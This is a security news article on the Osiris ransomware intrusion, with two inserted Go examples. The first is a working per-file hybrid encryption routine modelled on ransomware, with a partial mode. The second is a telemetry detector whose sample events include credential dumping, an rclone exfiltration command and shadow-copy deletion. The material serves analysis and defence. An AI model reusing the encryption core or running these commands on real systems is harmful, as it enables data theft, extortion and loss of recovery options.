Analysts Flag Possible INC Links in Newly Identified Osiris Ransomware

Researchers Detail Data Theft And Encryption Chain In Osiris Ransomware Case

The420 Web Desk

Security researchers tracking a November 2025 ransomware attack in Southeast Asia say the emergence of a new strain, dubbed Osiris, underscores how modern ransomware operations increasingly blend familiar tools, recycled techniques and ambiguous affiliations, complicating efforts to assign responsibility.

A New Name in a Crowded Ransomware Landscape

In November 2025, a major food service franchise operator in Southeast Asia became the victim of a ransomware attack that initially appeared routine: systems were disrupted, files encrypted and a ransom note left behind. But closer forensic examination by researchers at Symantec and VMware Carbon Black revealed something less familiar — a previously undocumented ransomware strain now known as Osiris.

Osiris is described by researchers as a full-featured and technically mature ransomware, built for experienced operators rather than novice criminals. It can stop services and processes, selectively encrypt files and folders, and drop a customized ransom note. Encrypted files have a “.Osiris” extension appended, and Volume Shadow Copy Service snapshots are deliberately deleted beforehand so that the built-in rollback path is already gone when recovery is attempted.

Although the name Osiris echoes a Locky variant that circulated briefly under the same name in 2016, investigators emphasize there is no evidence of a technical or operational link between the two. The similarity, they say, is limited to the name.


How the Attack Unfolded

The intrusion did not begin with encryption. According to the investigation, attackers spent several days inside the victim’s environment before deploying ransomware, quietly exfiltrating data using the legitimate file-sync utility Rclone. The stolen data was uploaded to a Wasabi cloud storage bucket, a tactic increasingly seen in so-called double-extortion attacks, where victims face both data encryption and the threat of public data leaks.

Only after this preparatory phase did the attackers launch the ransomware payload. Osiris supports a wide range of command-line options that let operators choose targets, logging behavior, encryption scope (partial or full) and even how Hyper-V virtualized environments are handled. Encryption uses a hybrid scheme: each file is encrypted with its own AES-128 key in CTR mode, and elliptic curve cryptography protects those per-file keys, so recovery depends on a private key that never touches the victim’s systems.

The ransomware also performs asynchronous input/output through Windows I/O completion ports, a design that lets a small pool of threads keep many read-encrypt-write operations in flight and noticeably speeds up encryption across large file sets. Victims are left with an “Osiris-MESSAGE.txt” file containing extortion instructions and negotiation links.
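The per-file hybrid scheme described above, shown as an added example rather than code from Osiris or from the Symantec and Carbon Black analysis. X25519 stands in for whichever elliptic curve the malware actually uses, a SHA-256 hash stands in for its unspecified key derivation, and the file header layout (ephemeral public key, IV, encrypted-length field for a partial mode) is my own assumption. It demonstrates why a unique key per file costs the attacker nothing: the ephemeral private key is discarded after every file, so the only thing that can rebuild any file key is the operator’s private key.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
)

// Constructed per-file layout (an assumption, not Osiris's real format):
//   [32 B ephemeral X25519 pubkey][16 B CTR IV][4 B encrypted length][body]
// Only the first "encrypted length" body bytes are ciphertext; a partial
// mode leaves the rest in the clear and trades that for speed.
const (
	pubLen = 32
	ivLen  = 16
	hdrLen = pubLen + ivLen + 4
)

// GenerateOperatorKey models the operator's long-term key pair; the private
// half never reaches the victim host.
func GenerateOperatorKey() (*ecdh.PrivateKey, error) {
	return ecdh.X25519().GenerateKey(rand.Reader)
}

// ctrStream derives the per-file AES-128 key from the ECDH shared secret (a
// SHA-256 over label, secret and ephemeral pubkey stands in for a KDF such as
// HKDF) and returns the CTR keystream for this file.
func ctrStream(shared, ephPub, iv []byte) (cipher.Stream, error) {
	key := sha256.Sum256(append(append([]byte("demo-file-key"), shared...), ephPub...))
	block, err := aes.NewCipher(key[:16]) // AES-128
	if err != nil {
		return nil, err
	}
	return cipher.NewCTR(block, iv), nil
}

// EncryptFile encrypts the first limit bytes of plaintext (limit <= 0: all)
// under a key unique to this call: a fresh ephemeral key pair is agreed
// against the operator's public key and then discarded, so no two files
// share a key and nothing left on the victim host can recover any of them.
func EncryptFile(operatorPub *ecdh.PublicKey, plaintext []byte, limit int) ([]byte, error) {
	eph, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	shared, err := eph.ECDH(operatorPub)
	if err != nil {
		return nil, err
	}
	out := make([]byte, hdrLen+len(plaintext))
	copy(out[:pubLen], eph.PublicKey().Bytes())
	iv := out[pubLen : pubLen+ivLen]
	if _, err := rand.Read(iv); err != nil {
		return nil, err
	}
	n := len(plaintext)
	if limit > 0 && limit < n {
		n = limit
	}
	binary.BigEndian.PutUint32(out[pubLen+ivLen:hdrLen], uint32(n))
	stream, err := ctrStream(shared, out[:pubLen], iv)
	if err != nil {
		return nil, err
	}
	body := out[hdrLen:]
	stream.XORKeyStream(body[:n], plaintext[:n])
	copy(body[n:], plaintext[n:]) // tail stays cleartext in partial mode
	return out, nil
}

// DecryptFile is the operator side: only the private key can recompute the
// shared secret from the ephemeral public key stored in the header.
func DecryptFile(operatorPriv *ecdh.PrivateKey, blob []byte) ([]byte, error) {
	if len(blob) < hdrLen {
		return nil, errors.New("blob shorter than header")
	}
	ephPub, err := ecdh.X25519().NewPublicKey(blob[:pubLen])
	if err != nil {
		return nil, err
	}
	shared, err := operatorPriv.ECDH(ephPub)
	if err != nil {
		return nil, err
	}
	stream, err := ctrStream(shared, blob[:pubLen], blob[pubLen:pubLen+ivLen])
	if err != nil {
		return nil, err
	}
	body := blob[hdrLen:]
	n := int(binary.BigEndian.Uint32(blob[pubLen+ivLen : hdrLen]))
	if n > len(body) {
		return nil, errors.New("encrypted length exceeds body")
	}
	pt := make([]byte, len(body))
	stream.XORKeyStream(pt[:n], body[:n])
	copy(pt[n:], body[n:])
	return pt, nil
}
```

Two details matter for responders. First, because every file carries its own ephemeral public key, encrypting the same file twice yields unrelated ciphertexts, so there is no shared keystream to recover across files. Second, a partial mode is visible on disk: beyond the encrypted prefix the original bytes survive, which is why carving the tails of large databases or archives from a partially encrypted volume is sometimes worthwhile even when the header is lost.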

Familiar Tools, Unclear Attribution

While Osiris itself appears new, much of the surrounding activity looked familiar to analysts. The attackers relied heavily on common dual-use and post-exploitation tools long associated with advanced ransomware crews. Among them was a customized Mimikatz variant, renamed kaz.exe, used to harvest credentials — a technique frequently observed in past INC ransomware operations.

Network discovery and lateral movement were carried out using utilities such as Netscan, Netexec and MeshAgent. For remote access, the attackers deployed a modified version of the RustDesk remote monitoring and management tool, disguising it as “WinZip Remote Desktop” by altering its file description and icon to evade suspicion during casual inspection.

These overlaps have fueled speculation about possible links to the INC ransomware ecosystem, also known as Warble. Researchers caution, however, that tool reuse alone is insufficient to establish direct attribution, noting that shared utilities are often copied or repurposed across criminal groups.

Disabling Defenses Before Encryption

One of the most consequential steps in the attack involved the deliberate neutralization of endpoint security controls. Investigators found that the attackers deployed a malicious kernel-mode driver known as POORTRY, also referred to as Abyssworker. It was loaded using a bring-your-own-vulnerable-driver (BYOVD) technique, in which the attackers bring a driver that Windows will accept and then abuse its kernel-level privileges to terminate security software, rather than relying on anything already installed on the system.

The POORTRY driver was disguised as a legitimate Malwarebytes component, further reducing the likelihood of early detection. In parallel, the attackers used KillAV, a utility specifically designed to disable antivirus protections. Remote Desktop Protocol was then enabled to maintain persistent access before the ransomware was finally launched.
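The checks a defender would run over process-creation telemetry for the tradecraft described in this and the earlier sections: the renamed Mimikatz (kaz.exe), the RustDesk build passed off as “WinZip Remote Desktop”, the Rclone upload to Wasabi, the shadow-copy deletion and the installation of a kernel driver service. This is an added example, not tooling from the Symantec or Carbon Black investigation. The event fields mirror Sysmon Event ID 1 attributes, but the struct, the rule names and every sample record below are constructed for illustration.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// ProcessEvent is a trimmed stand-in for a Sysmon Event ID 1 record. The
// field names follow Sysmon's; the struct itself is constructed for this example.
type ProcessEvent struct {
	Image            string // path of the launched binary
	OriginalFileName string // from the PE version resource
	Description      string // FileDescription from the PE version resource
	CommandLine      string
}

// Finding is one rule hit against one event.
type Finding struct {
	Rule  string
	Image string
}

// knownTools maps the version-resource file name of dual-use tools seen in
// this intrusion to a short label, so a rename on disk does not hide them.
var knownTools = map[string]string{
	"mimikatz.exe": "credential-dumper",
	"rustdesk.exe": "remote-access-tool",
	"rclone.exe":   "cloud-sync-tool",
	"netscan.exe":  "network-scanner",
}

// baseName lower-cases and strips the directory from a Windows path.
func baseName(p string) string {
	return strings.ToLower(filepath.Base(strings.ReplaceAll(p, `\`, "/")))
}

// Evaluate applies every rule to one event and returns all hits.
func Evaluate(ev ProcessEvent) []Finding {
	var hits []Finding
	img := baseName(ev.Image)
	orig := strings.ToLower(ev.OriginalFileName)
	cmd := strings.ToLower(ev.CommandLine)
	add := func(rule string) { hits = append(hits, Finding{rule, ev.Image}) }

	// 1. Renamed on disk: the version resource still names the real tool
	//    (kaz.exe carrying mimikatz.exe, a "WinZip" binary carrying rustdesk.exe).
	if orig != "" && orig != img {
		add("renamed-binary:" + orig)
	}
	// 2. Known dual-use tool, whatever it is called on disk.
	if label, ok := knownTools[orig]; ok {
		add("dual-use-tool:" + label)
	}
	// 3. Rclone pointed at an S3-compatible endpoint (Wasabi in this case).
	if (orig == "rclone.exe" || img == "rclone.exe") &&
		(strings.Contains(cmd, "wasabisys.com") || strings.Contains(cmd, ":s3:")) {
		add("rclone-to-s3")
	}
	// 4. Shadow copy deletion ahead of encryption.
	if (img == "vssadmin.exe" && strings.Contains(cmd, "delete shadows")) ||
		(img == "wmic.exe" && strings.Contains(cmd, "shadowcopy delete")) {
		add("shadow-copy-deletion")
	}
	// 5. Kernel driver service creation, the usual way a brought-along driver is loaded.
	if img == "sc.exe" && strings.Contains(cmd, "type= kernel") {
		add("kernel-driver-service")
	}
	return hits
}

// Scan runs Evaluate over a batch of events.
func Scan(events []ProcessEvent) []Finding {
	var all []Finding
	for _, ev := range events {
		all = append(all, Evaluate(ev)...)
	}
	return all
}

// SampleEvents are constructed records modelled on the tradecraft in this
// article; none of them are real telemetry from the case.
func SampleEvents() []ProcessEvent {
	return []ProcessEvent{
		{Image: `C:\Users\Public\kaz.exe`, OriginalFileName: "mimikatz.exe",
			Description: "mimikatz for Windows", CommandLine: `kaz.exe "sekurlsa::logonpasswords" exit`},
		{Image: `C:\ProgramData\WinZip\wzrd.exe`, OriginalFileName: "rustdesk.exe",
			Description: "WinZip Remote Desktop", CommandLine: `wzrd.exe --service`},
		{Image: `C:\Windows\Temp\rclone.exe`, OriginalFileName: "rclone.exe",
			Description: "Rsync for cloud storage",
			CommandLine: `rclone.exe copy D:\Shares\Finance wasabi:corp-backup --s3-endpoint s3.wasabisys.com`},
		{Image: `C:\Windows\System32\vssadmin.exe`, OriginalFileName: "VSSADMIN.EXE",
			Description: "Command Line Interface for Microsoft Volume Shadow Copy Service",
			CommandLine: `vssadmin.exe delete shadows /all /quiet`},
		{Image: `C:\Windows\System32\sc.exe`, OriginalFileName: "sc.exe",
			CommandLine: `sc.exe create mbdrv type= kernel binPath= C:\Windows\Temp\mb.sys`},
		{Image: `C:\Windows\System32\svchost.exe`, OriginalFileName: "svchost.exe",
			Description: "Host Process for Windows Services", CommandLine: `svchost.exe -k netsvcs`},
	}
}

func main() {
	for _, f := range Scan(SampleEvents()) {
		fmt.Printf("%-32s %s\n", f.Rule, f.Image)
	}
}
```

The rename check leans on OriginalFileName, which comes from the PE version resource and is therefore attacker-controllable: the article says the RustDesk build had its file description and icon altered, and whether OriginalFileName was also edited is not stated, so the sample event assumes it was left intact. A rebuilt binary with consistent version metadata defeats rule 1 and rule 2 entirely, which is why these string checks belong alongside hash and signer reputation rather than in place of them. The `sc.exe ... type= kernel` indicator is generic and will also fire on legitimate driver installs; it earns its keep as context next to the other hits, not on its own.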

Little is known about who developed Osiris or whether it is being offered as part of a ransomware-as-a-service model. Symantec and Carbon Black researchers say the evidence points to either a former INC affiliate or actors closely imitating established INC tradecraft.
